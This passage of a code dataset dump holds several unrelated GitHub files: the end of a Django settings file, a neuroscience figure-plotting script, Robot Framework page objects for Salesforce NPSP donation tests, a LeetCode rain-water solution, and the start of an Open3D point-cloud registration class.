here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'webauth.middleware.WebauthMiddleware',\n)\n\nROOT_URLCONF = 'assassins_project.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'assassins_project.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n 'assassins/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'assassins',\n 'webauth',\n)\n\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"pcostell/assassins-django","sub_path":"assassins_project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38732885802","text":"import numpy as np\nimport scipy.stats as sps\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nimport pickle\nfrom scikits.bootstrap import bootstrap as boot\nimport seaborn as sns\n\n##############################################################################\n#\t\t\t\tFUNCTIONS FOR PLOTTING AND STATISTICAL TESTS\t #\n##############################################################################\n\ndef sig_bar(ax,sigs,axis,y,color):\n\tw=np.diff(axis)[0]\n\tcontinuity=np.diff(sigs)\n\tfor i,c in enumerate(continuity):\n\t\tbeg = axis[sigs[i]]-w/2\n\t\tend = beg+w\n\t\tax.fill_between([beg,end],[y[0],y[0]],[y[1],y[1]],color=color)\n\ndef boot_test(data, thr=0, n_samples=1000000):\n\tdata \t\t= np.array(data)\t\n\tt_data \t= np.nanmean(data) - thr\n\tboot_data \t= data[boot.bootstrap_indexes_array(data, n_samples=n_samples)]\n\tt_boot \t\t= (np.nanmean(boot_data,1) - np.nanmean(data))\n\tp \t\t\t= np.nanmean(abs(t_data)<=abs(t_boot))\n\treturn p, np.percentile(np.mean(boot_data,1),[2.5,97.5])\n\n\n##############################################################################\n#\t\t\t\t\t\t\tLOAD DATA FOR PLOTTING\t \t\t #\n##############################################################################\n\nwith open('preprocessed_data/cross_decoders.pkl', 'rb') as f: \n dtime, delay, resp, sig_005, t_delay = pickle.load(f)\n\nwith open('preprocessed_data/crossmatrix_decoders.pkl', 'rb') as f:\n mtime, matrix = pickle.load(f)\n\nwith open('preprocessed_data/serial_bias.pkl', 'rb') as f:\n xxx, serial, sigpos, signeg = pickle.load(f)\n\n\n##############################################################################\n#\t\t\t\t\t\t\tSETTINGS FOR PLOTTING\t \t\t #\n##############################################################################\n\nnp.set_printoptions(precision=4)\nsns.set_context(\"talk\", font_scale=1)\nsns.set_style(\"ticks\")\n\norange \t= sns.xkcd_rgb[\"orange\"]\ngreenish = sns.xkcd_rgb[\"greenish\"]\ndeepblue = sns.xkcd_rgb[\"deep blue\"]\npalered = sns.xkcd_rgb[\"pale red\"]\n\n\n##############################################################################\n#\t\t\t\t\t\t\tSET UP FIGURE LAYOUT\t \t\t #\n##############################################################################\n\nplt.figure(figsize=(9,8.5))\n\ngs1 = gs.GridSpec(3, 7)\ngs1.update(bottom=.56, wspace=1)\nax1 = plt.subplot(gs1[:,:3])\nax2 = plt.subplot(gs1[:,3:6])\nax22 = plt.subplot(gs1[:,-1])\n\ngs2\t= gs.GridSpec(1,3, width_ratios=[2, 1, 3])\ngs2.update(top=.45, right=.7)\nax6 = plt.subplot(gs2[0])\nax7 = 
plt.subplot(gs2[1])\nax8 = plt.subplot(gs2[2])\n\ngs3 = gs.GridSpec(3, 1)\ngs3.update(top=.45, left=.8)\nax3 = plt.subplot(gs3[0,-1])\nax4 = plt.subplot(gs3[1,-1])\nax5 = plt.subplot(gs3[2,-1])\n\n\n##############################################################################\n#\t\t\t\t\t\tPLOT DELAY AND RESPONSE DECODER\t \t\t \t #\n##############################################################################\n\nlate \t= np.where((dtime[1,:]==0) & (dtime[0,:]>.65) & (dtime[0,:]<.85))[0]\nclick \t= np.where((dtime[1,:]==2) & (dtime[0,:]>-.1) & (dtime[0,:]<.1))[0]\nreig \t= np.where((dtime[1,:]==3) & (dtime[0,:]>-.95) & (dtime[0,:]<-.75))[0]\n\nnsubs \t= delay.shape[0]\n\ntimes \t= np.where((dtime[1,:]==0) & (dtime[0,:]>.25) & (dtime[0,:]<1.5))[0]\nS \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>0) & (dtime[0,:]<.25))[0]\nax6.plot(dtime[0,times], np.mean(delay,0)[times], color = 'k')\nax6.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5)\nax6.plot(dtime[0,times], np.mean(resp,0)[times],'k', alpha=.5)\nax6.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax6.plot(dtime[0,late], np.zeros(len(dtime[0,late]))-.015, 'o', color=palered)\nsig_bar(ax6,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax6.plot(dtime[0,S[0]], -.195, 'k^', ms=14)\nax6.set_xlim([.25,1.25])\nax6.set_xticks([.5,1])\nax6.set_ylim([-.2,.2])\nax6.set_yticks([-.2,-.1,0,.1,.2])\nax6.set_ylabel('decoding strength (a.u.)')\nax6.get_yaxis().set_tick_params(direction='in')\nax6.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax6)\n\ntimes \t= np.where((dtime[1,:]==2) & (dtime[0,:]>-.3) & (dtime[0,:]<.3))[0]\nR \t\t= np.where((dtime[1,:]==2) & (dtime[0,:]>0))[0][0]\nax7.plot(dtime[0,times], np.mean(delay,0)[times], color='k')\nax7.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5)\nax7.plot(dtime[0,times], np.mean(resp,0)[times], 'k', alpha=.5)\nax7.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax7.plot(dtime[0,click], np.zeros(len(dtime[0,click]))-.015, 'o', color=deepblue)\nsig_bar(ax7,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax7.plot(dtime[0,R], -.195, 'k^', ms=14)\nax7.text(-.23, -.17, r'$(R_{n-1})$') \nax7.text(-.23, -.13, 'report') \nax7.set_ylim([-.2,.2])\nax7.set_xlim([-.25,.25])\nax7.set_xticks([-.25,.25])\nax7.set_xlabel('time from point of alignment (s)')\nax7.set_yticks([])\nax7.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax7, left=True)\n\ntimes \t= np.where((dtime[1,:]==3) & (dtime[0,:]>-1.5) & (dtime[0,:]<.5))[0]\nF \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>-1.1))[0][0]\nS \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>0) & (dtime[0,:]<.25))[0]\nax8.plot(dtime[0,times], np.mean(delay,0)[times], color='k')\nax8.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5,\n\tlabel='delay code')\nax8.plot(dtime[0,times], np.mean(resp,0)[times], 'k', alpha=.5, \n\tlabel='response code')\nax8.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax8.fill_between(dtime[0,S], np.zeros(len(S))-.2, np.zeros(len(S))+.2, \n\tcolor='grey', alpha=.2)\nax8.plot(dtime[0,reig], np.zeros(len(dtime[0,reig]))-.015, 'o', color=orange)\nsig_bar(ax8,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax8.plot(dtime[0,F], 
-.195, 'k^', ms=14)\nax8.plot(dtime[0,S[0]], -.195, 'k^', ms=14)\nax8.text(-1.25, -.13, 'fixation on')\nax8.text(-.3, -.13, 'stim on')\nax8.text(-1.250, -.17, r'$(F_n)$') \nax8.text(-.1, -.17, r'$(S_n)$')\nax8.set_ylim([-.2,.2])\nax8.set_xlim([-1.25,.25])\nax8.set_xticks([-1,-.5,0])\nax8.set_yticks([-.2,-.1,0,.1,.2]); ax8.set_yticklabels([])\nsns.despine(ax=ax8, left=True, right=False)\nax8.legend(frameon=False)\nax8.get_yaxis().set_tick_params(direction='in')\nax8.get_xaxis().set_tick_params(direction='in')\n\n\n##############################################################################\n#\t\t\t\t\t\t\tPLOT DELAY TUNING CURVES\t \t\t \t #\n##############################################################################\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,late],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,late],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax3.plot(np.arange(9), tun, color=palered)\nax3.fill_between(np.arange(9), tun+se, tun-se, color=palered, alpha=.3)\nax3.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax3.set_ylim([-.5,.5])\nax3.set_xlim([0,8])\nax3.set_yticks([-.5,0,.5]); ax3.set_yticklabels([])\nsns.despine(ax=ax3, left=True, right=False)\nax3.get_yaxis().set_tick_params(direction='in')\nax3.get_xaxis().set_tick_params(direction='in')\nax3.set_xticks([4]); ax3.set_xticklabels([''])\n\nprint(boot_test(np.mean(t_delay[:,:,late],2)[:,0]-np.mean(t_delay[:,:,late],2)[:,4], n_samples=10000000))\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,click],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,click],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax4.plot(np.arange(9), tun, color=deepblue)\nax4.fill_between(np.arange(9), tun+se, tun-se, color=deepblue, alpha=.3)\nax4.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax4.set_ylim([-.5,.5])\nax4.set_xlim([0,8])\nax4.set_yticks([-.5,0,.5])\nax4.set_ylabel('tuning to previous stimulus')\nsns.despine(ax=ax4, left=True, right=False)\nax4.get_yaxis().set_tick_params(direction='in')\nax4.get_xaxis().set_tick_params(direction='in')\nax4.yaxis.set_label_position(\"right\")\nax4.set_xticks([4]); ax4.set_xticklabels([''])\n\nprint(boot_test(np.mean(t_delay[:,:,click],2)[:,0]-np.mean(t_delay[:,:,click],2)[:,4], n_samples=10000000))\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,reig],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,reig],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax5.plot(np.arange(9), tun, color=orange)\nax5.fill_between(np.arange(9), tun+se, tun-se, color=orange, alpha=.3)\nax5.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax5.set_ylim([-.5,.5])\nax5.set_xlim([0,8])\nax5.set_yticks([-.5,0,.5]); ax5.set_yticklabels([])\nax5.set_xticks([0,4,8]); ax5.set_xticklabels([-180,0,180])\nsns.despine(ax=ax5, left=True, right=False)\nax5.get_yaxis().set_tick_params(direction='in')\nax5.get_xaxis().set_tick_params(direction='in')\nax5.set_xlabel('presented cue')\n\nprint(boot_test(np.mean(t_delay[:,:,reig],2)[:,0]-np.mean(t_delay[:,:,reig],2)[:,4], n_samples=10000000))\n\n##############################################################################\n#\t\t\t\t\tPLOT CROSS-TEMPORAL DECODING MATRIX\t \t\t \t #\n##############################################################################\n\nvalid = np.where(((mtime[1,:]==0) & (mtime[0,:]>-.3) & (mtime[0,:]<1.3))| \n\t\t((mtime[1,:]==2) & (mtime[0,:]>-.3) & (mtime[0,:]<.3)) | 
\n\t\t((mtime[1,:]==3) & (mtime[0,:]>-1.3) & (mtime[0,:]<.3) ))[0]\n\nmat = matrix[:,valid,:][:,:,valid]\nmt\t = mtime[:,valid]\n\ncut1 = np.where((mt[1,:]==0))[0][-1]\ncut2 = np.where((mt[1,:]==2))[0][-1]\n\nstim = np.where((mt[0,:]>0))[0][0]\ndelay = np.where((mt[0,:]>0.75))[0][0]\nresp = np.where((mt[0,:]<0) & (mt[1,:]==2))[0][-1]\nfix = np.where((mt[0,:]<-1.1) & (mt[1,:]==3))[0][-1]\nstim2 = np.where((mt[0,:]>0) & (mt[1,:]==3))[0][0]\n\nnsamps = mat.shape[1]\n\nc = ax2.imshow(np.mean(mat,0), aspect='auto', origin='lower', \n\tvmin=0, vmax=.1, cmap='plasma')\nax2.plot([cut1,cut1], [-.3,nsamps-.5], 'w-', lw=2)\nax2.plot([cut2,cut2], [-.3,nsamps-.5], 'w-', lw=2)\nax2.plot([-.3,nsamps-.5], [resp,resp], 'w--', lw=2)\nax2.plot([-.3,nsamps-.5], [delay,delay], 'w--', lw=2)\nax2.plot([-.3,nsamps-.5], [cut1,cut1], 'w-', lw=2)\nax2.plot([-.3,nsamps-.5], [cut2,cut2], 'w-', lw=2)\nax2.fill_between([nsamps-5.5,nsamps-.5],[5.5,5.5],[4,4], color='k')\nax2.text(nsamps-10, 3, '.5 s')\nax2.set_yticks([stim, resp, fix, stim2]); \nax2.set_yticklabels([r'$S_{n-1}$', r'$R_{n-1}$', r'$F_n$', r'$S_n$'], \n\trotation='vertical')\nax2.set_xticks([stim, resp, fix, stim2]); \nax2.set_xticklabels([r'$S_{n-1}$', r'$R_{n-1}$', r'$F_n$', r'$S_n$'])\nax2.set_xlabel('testing time')\nax2.set_ylabel('training time')\nax2.set_ylim()\nsns.despine(ax=ax2, left=True, bottom=True)\nplt.colorbar(mappable=c, ax=ax22, shrink=2, ticks=[0,.1], \n\tlabel='decoding strength (a.u.)')\nsns.despine(ax=ax22, left=True, bottom=True)\nax22.set_xticks([]); ax22.set_yticks([]); \n\n\n##############################################################################\n#\t\t\t\t\t\t\t\tPLOT SERIAL BIAS\t \t\t\t \t     #\n##############################################################################\n\nax1.plot(xxx, np.nanmean(serial,0), color='k')\n# use nanmean for both band edges, matching the mean line above\nax1.fill_between(xxx, np.nanmean(serial,0) + sps.sem(serial,0), \n\tnp.nanmean(serial,0) - sps.sem(serial,0), color='grey', alpha=.25)\nsig_bar(ax1,np.where(sigpos)[0],xxx,[.97,1], 'k')\nsig_bar(ax1,np.where(signeg)[0],xxx,[.97,1], 'k')\nax1.plot(xxx, np.zeros(len(xxx)),'k--', alpha=.3)\nax1.set_ylim([-.5,1])\nax1.set_xlim([0,120])\nax1.set_ylabel(r'error in current trial $\\theta^{\\prime}_{e}$ ($^\\circ$)')\nax1.set_yticks([-.5,0,.5,1])\nax1.set_xticks([0,60,120]); ax1.set_xticklabels([30,90,150])\nax1.set_xlabel('relative location of\\n previous trial ' + r'$\\theta_{d}$ ($^\\circ$)')\nax1.get_yaxis().set_tick_params(direction='in')\nax1.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax1)\n\nplt.show()\n","repo_name":"comptelab/interplayPFC","sub_path":"Fig2/plot_fig2.py","file_name":"plot_fig2.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"3729973810","text":"from cumulusci.robotframework.pageobjects import ListingPage\nfrom cumulusci.robotframework.pageobjects import DetailPage\nfrom cumulusci.robotframework.pageobjects import pageobject\nfrom cumulusci.robotframework.utils import capture_screenshot_on_error\nfrom BaseObjects import BaseNPSPPage\nfrom NPSP import npsp_lex_locators\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n@pageobject(\"Listing\", \"npe03__Recurring_Donation__c\")\nclass RDListingPage(BaseNPSPPage, ListingPage):\n    object_name = \"npe03__Recurring_Donation__c\"\n\n\n\n@pageobject(\"Details\", \"npe03__Recurring_Donation__c\")\nclass RDDetailPage(BaseNPSPPage, DetailPage):\n    object_name = \"npe03__Recurring_Donation__c\"\n    \n    def 
_is_current_page(self):\n        \"\"\" Verify we are on the Recurring Donation detail page\n            by verifying that the url contains '/view'\n        \"\"\"\n        self.selenium.wait_until_location_contains(\"/view\", timeout=60, message=\"Record view did not open in 1 min\")\n        self.selenium.location_should_contain(\"/lightning/r/npe03__Recurring_Donation__c/\",message=\"Current page is not a Recurring Donations record view\")\n    \n    def refresh_opportunities(self):\n        \"\"\"Clicks on the more actions dropdown and clicks the Refresh Opportunities action\"\"\"\n        locator=npsp_lex_locators['link-contains'].format(\"more actions\")\n        self.selenium.click_element(locator)\n        self.selenium.wait_until_page_contains(\"Refresh Opportunities\")\n        link_locator=npsp_lex_locators['link'].format('Refresh_Opportunities','Refresh_Opportunities')\n        # select the Refresh Opportunities action from the opened dropdown\n        self.selenium.click_element(link_locator)\n    \n    def click_actions_button(self,button_name):\n        \"\"\"Clicks on action button based on API version\"\"\"\n        if self.npsp.latest_api_version == 47.0:\n            self.selenium.click_link(button_name)\n        else:\n            self.selenium.click_button(button_name)\n    \n    @capture_screenshot_on_error\n    def validate_field_values_under_section(self, section=None, **kwargs):\n        \"\"\"Based on the section name, navigates to the section and validates the key, value pairs passed in kwargs.\n        If the section is Current Schedule, waits for the Current Schedule section card on the side bar and\n        validates that the display fields in the card match the values passed in the key, value pairs\"\"\"\n        \n        if section == \"Current Schedule\":\n            active_schedule_card = npsp_lex_locators[\"erd\"][\"active_schedules_card\"].format(section)\n            number_fields = ['Amount','Installment Frequency']\n            date_fields = ['Effective Date']\n            self.selenium.wait_until_element_is_visible(active_schedule_card,60)\n            for label, value in kwargs.items():\n                if label in number_fields:\n                    locator = npsp_lex_locators[\"erd\"][\"formatted_number\"].format(label)\n                    actual_value=self.selenium.get_webelement(locator).text\n                elif label in date_fields:\n                    locator = npsp_lex_locators[\"erd\"][\"formatted_date\"].format(label)\n                    actual_value=self.selenium.get_webelement(locator).text\n                else:\n                    locator = npsp_lex_locators[\"erd\"][\"formatted_text\"].format(label)\n                    actual_value=self.selenium.get_webelement(locator).text\n                \n                if self.npsp.check_if_element_exists(locator):\n                    print(f\"element exists {locator}\")\n                    actual_value=self.selenium.get_webelement(locator).text\n                    print(f\"actual value is {actual_value}\")\n                    self.builtin.log(f\"actual value is {actual_value}\")\n                    assert value == actual_value, \"Expected {} value to be {} but found {}\".format(label,value, actual_value)\n                else:\n                    self.builtin.log(\"element Not found\")\n        else:\n            for label, value in kwargs.items():\n                self.npsp.navigate_to_and_validate_field_value(label, \"contains\", value, section)\n    \n    \n    \n    @capture_screenshot_on_error\n    def validate_upcoming_schedules(self, num_payments,startdate,dayofmonth):\n        \"\"\"Takes in the parameter (number of payments) and the donation start date,\n        verifies that the payment schedules created on the UI reflect the total number, and\n        verifies that the next payment dates are reflected correctly for all the schedules\"\"\"\n        \n        installmentrow = npsp_lex_locators[\"erd\"][\"installment_row\"]\n        installments = self.selenium.get_webelements(installmentrow)\n        count = len(installments)\n        print(f\"Number of installments created is {count}\")\n        assert count == int(num_payments), \"Expected installments to be {} but found {}\".format(num_payments, count)\n        if count == int(num_payments):\n            i = 1\n            while i < count:\n                datefield = 
npsp_lex_locators[\"erd\"][\"installment_date\"].format(i)\n installment_date = self.selenium.get_webelement(datefield)\n date_object = datetime.strptime(startdate, '%m/%d/%Y').date()\n expected_date = (date_object+relativedelta(months=+i)).replace(day=int(dayofmonth))\n actual_date=self.selenium.get_webelement(installment_date).text\n formatted_actual = datetime.strptime(actual_date, '%m/%d/%Y').date()\n assert formatted_actual == expected_date, \"Expected date to be {} but found {}\".format(expected_date,formatted_actual)\n i=i+1","repo_name":"Clickfunne/NPSP","sub_path":"robot/Cumulus/resources/RecurringDonationsPageObject.py","file_name":"RecurringDonationsPageObject.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37648468854","text":"# UBER\r\n\"\"\"\r\n SOLVED -- LEETCODE#42\r\n You have a landscape, in which puddles can form.\r\n You are given an array of non-negative integers representing the elevation at each location.\r\n Return the amount of water that would accumulate if it rains.\r\n\r\n For example: [0,1,0,2,1,0,1,3,2,1,2,1] should return 6 because 6 units of water can get trapped here.\r\n X \r\n X...XX.X \r\n X.XX.XXXXXX \r\n # [0,1,0,2,1,0,1,3,2,1,2,1]\r\n X reprecents the surface of the mountain any . represent clogged water\r\n\"\"\"\r\n\r\ndef capacity(arr):\r\n # Time: O(n) Space: O(n)\r\n n = len(arr)\r\n if n == 0: return 0\r\n leftHigh = [0 for _ in range(n)] \r\n rightHigh = [0 for _ in range(n)]\r\n \r\n leftHigh[0] = arr[0]\r\n for i in range(1, n):\r\n leftHigh[i] = max(leftHigh[i-1], arr[i])\r\n\r\n rightHigh[n-1] = arr[n-1]\r\n for i in range(n-2, -1, -1):\r\n rightHigh[i] = max(rightHigh[i+1], arr[i])\r\n\r\n sol = 0\r\n for i in range(n):\r\n sol += max(0, min(leftHigh[i], rightHigh[i]) - arr[i])\r\n\r\n return sol\r\n\r\nprint(capacity([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]))\r\n# 6","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2019/09-September/09.04.py","file_name":"09.04.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26723515365","text":"from utils import colour_map, min_max_normalisation, mae\nfrom open3d import JVisualizer\nfrom xlrd import XLRDError\nfrom sklearn import neighbors\n\nimport pandas as pd\nimport numpy as np\nimport open3d as o3d\nimport copy\nimport matplotlib.pyplot as plt\nimport tifffile.tifffile as tiff\n\n\nclass RegistrationObj():\n \n def __init__(self, pos_path_source, pos_path_target, color_path_source, color_path_target, \n algorithm, **kwargs):\n self.pos_path_source= pos_path_source\n self.source_pcd = o3d.geometry.PointCloud()\n self.pos_path_target= pos_path_target\n self.target_pcd = o3d.geometry.PointCloud()\n self.color_path_source= color_path_source\n self.source_color = None\n self.norm_source_color = None\n self.color_path_target= color_path_target\n self.target_color = None\n self.norm_target_color = None\n self.algorithm = algorithm\n assert (self.algorithm=='colored_icp'or self.algorithm=='icp' or self.algorithm=='ransac'), 'Invalid algorithm specified. 
Choose from: \\n ransac -> runs only RANSAC global registration \\n icp -> runs RANSAC and then local ICP registration \\n colored_icp -> runs RANSAC and then local colored ICP registration'\n self.preprocessing = False\n self.result = None\n self.registration_result = o3d.pipelines.registration.RegistrationResult()\n self.mae = None\n self.registered_color = None\n self.registered_target = None\n self.mode = \"knn\"\n self.method = \"Median\"\n self.other_registered_channels = []\n self.manual_corr_map = None #To insert corr map obtained from GA. Will override corr_map from registration result\n \n \n \"\"\"Setting the arguments for create_pcd\"\"\"\n self.pos_skiprows = None\n self.pos_usecols = None\n self.pos_header = 0\n self.color_skiprows = None\n self.color_usecols = None\n self.color_header = 0\n \n self.__dict__.update(kwargs)\n\n \"\"\" Setting the values of registration parameters\"\"\"\n self.voxel_size = kwargs.get('voxel_size', 10)\n self.downsampling = kwargs.get('downsampling', False)\n self.norm_radius_modifier = kwargs.get('norm_radius_modifier', 2)\n self.norm_maxnn = kwargs.get('norm_maxnn', 30)\n self.fpfh_radius_modifier = kwargs.get('fpfh_radius_modifier', 5)\n self.fpfh_maxnn = kwargs.get('fpfh_maxnn', 100)\n self.ransac_dist_modifier = kwargs.get('ransac_dist_modifier', 1.5)\n self.ransac_edge_length = kwargs.get('ransac_edge_length', 0.9)\n self.ransac_mutual_filter = kwargs.get('ransac_mutual_filter', True)\n self.icp_dist_check = kwargs.get('icp_dist_check', 1)\n self.coloredICP_maxnn = kwargs.get('coloredICP_maxnn', 50)\n self.other_source_channels = kwargs.get('other_source_channels', [])\n self.other_target_channels = kwargs.get('other_target_channels', []) \n self.n_neighbors = kwargs.get('n_neighbors', 5)\n self.weights = kwargs.get('weights', \"distance\")\n \n def __str__(self):\n try:\n string = \"\"\"--- Registration Object--- \\nAlgorithm used = {0} \\nPreprocessing performed = {1} \\nRegistration performed = {2} \n \\nFitness = {3:.2f} \\nInlier RMSE = {4:.2f} \\nScaled inlier RMSE = {5:.2f} \\nMAE = {6:.2f} \n \\nRegistered color = {7}\"\"\". 
format(self.algorithm, self.preprocessing, \n self.result, \n self.registration_result.fitness,\n self.registration_result.inlier_rmse, \n (self.registration_result.inlier_rmse/self.registration_result.fitness),\n self.mae, self.registered_color)\n return string\n \n except ZeroDivisionError:\n \"\"\" Occurs if registration hasn't been performed as scaled_inlier_rmse divides by zero fitness\"\"\"\n \n string = \"\"\"--- Registration Object--- \\nAlgorithm used = {0} \\nPreprocessing performed = {1} \\nRegistration performed = {2}\"\"\" .format(self.algorithm, self.preprocessing, self.result) \n return string\n \n def __repr__(self):\n return self.__str__()\n\n def preprocessing_status_update(self):\n self.preprocessing = True\n \n def result_status_update(self):\n self.result = True\n \n def registration_result_update(self, registration_result):\n self.registration_result = registration_result\n \n def update_source_color(self, source_color):\n self.source_color = source_color\n \n def update_norm_source_color(self, norm_source_color):\n self.norm_source_color = norm_source_color\n \n def update_target_color(self, target_color):\n self.target_color = target_color\n \n def update_norm_target_color(self, norm_target_color):\n self.norm_target_color = norm_target_color\n \n def update_source_pcd(self, source_pcd):\n self.source_pcd = source_pcd\n \n def update_target_pcd(self, target_pcd):\n self.target_pcd = target_pcd\n \n def update_mae(self, mae):\n self.mae = mae\n \n def update_registered_color(self, registered_color):\n self.registered_color = registered_color\n \n def update_registered_target(self, registered_target):\n self.registered_target = registered_target \n \n def update_other_registered_channels(self, other_registered_channels):\n self.other_registered_channels = other_registered_channels \n\n def create_pcd(self, print_filenames = False):\n \"\"\" Converts excel (.xls or .csv) files containing xyz coordinates into geometry.PointCloud object. \n Returns the filenames as a list if return_filenames=True. \"\"\"\n\n filenames = []\n \n \"\"\" Handling .xls files\"\"\"\n try: \n source_df = pd.read_excel(self.pos_path_source, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n target_df = pd.read_excel(self.pos_path_target, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n source_color_df = pd.read_excel(self.color_path_source, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n target_color_df = pd.read_excel(self.color_path_target, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header) \n \n source_pcd = o3d.geometry.PointCloud() \n source_np = np.asarray(source_df)\n assert (len(source_np.shape)==2 and source_np.shape[1]==3), 'Source points file has incorrect dimensions. \\n Source points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (source_np.dtype=='float64'), 'Source points contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header, pos_usecols attributes.'\n \n source_color = np.asarray(source_color_df)\n assert (len(source_color.shape)==2 and source_color.shape[1]==1), 'Source colors file has incorrect dimensions. \\n Source colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (source_color.dtype=='float64'), 'Source colors contain non-float values. 
\\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n self.update_source_color(source_color)\n norm_colors_source = min_max_normalisation(source_color)\n self.update_norm_source_color(norm_colors_source)\n \n source_rgb, _ = colour_map(source_color,\"viridis\")\n source_pcd.points=o3d.utility.Vector3dVector(source_np)\n source_pcd.colors=o3d.utility.Vector3dVector(source_rgb)\n o3d.io.write_point_cloud(self.pos_path_source.split('.xls')[0] + '.pcd', source_pcd)\n self.update_source_pcd(source_pcd)\n filenames.append(self.pos_path_source.split('.xls')[0] + '.pcd')\n \n target_pcd = o3d.geometry.PointCloud() \n target_np = np.asarray(target_df)\n assert (len(target_np.shape)==2 and target_np.shape[1]==3), 'Target points file has incorrect dimensions. \\n Target points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (target_np.dtype=='float64'), 'Target points contain non-float values. 